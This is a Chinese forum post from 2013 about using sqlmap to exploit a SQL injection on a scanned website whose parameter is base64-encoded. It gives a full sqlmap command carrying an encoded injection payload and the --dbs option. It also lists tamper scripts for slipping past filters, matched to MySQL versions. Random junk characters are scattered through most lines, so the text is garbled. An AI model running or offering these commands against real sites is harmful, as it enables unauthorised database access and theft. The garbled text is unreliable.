WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
t9 ^; m. x! ~" i' U2 } z+ P. a) f3 H, e9 @) n0 }1 |8 S! L
sqlmap的tamper里有个base64encode.py' f( r& y2 U: B+ D# i# N1 q7 x
r# W! M' r4 y- {
使用如下
5 r F9 p; }5 W" S" f4 F, |( @! A# k4 q- L' s: h
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs0 g* q# M7 v% |4 ~
/ O& `) e4 U0 O' w! a& T6 X
6 D& b9 d0 s7 b5 q4 E$ k1 R
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
' Y, k, `: |7 u: j! o0 `, C; B) m, T% u; Y" M$ M
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
) [6 Y: Q( Y( R8 d8 U }
U* l0 t1 \* U: v0 }8 M( F ospace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
% F; s- d( \1 `+ Z5 Bspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入/ o4 J3 X) i K
首先确定目标数据库版本,然后选择相应的脚本。9 q( |3 f3 D- X8 ~) ^
-v 3 --batch --tamper "space2hash.py"
; `) n( K* n2 Q0 f8 R1 [$ R) m
. m Q8 V- E4 i( o/ @还有其他一些插件:
0 z. O9 ^5 l4 |9 h2 j4 {, f2 n3 Q! fencodes编码 ——charencode.py
' a4 r _; K7 Zbase64编码 —— base64encode.py! f+ x- {) t2 ?1 Y2 T( j: D
替换空格和关键字 —— halfversionedmorekeywords.py
/ C# ]% ]1 j5 ]6 F( H* \ |
6 k) ]: H# j: t/ I) @2 @* i- |+ z* Z; m! }8 G
2 Q- t# \6 G. I* U5 J/ u# B
7 r) R7 U L# `6 U0 x |
发表于 2013-11-23 15:50:45
收藏
支持
反对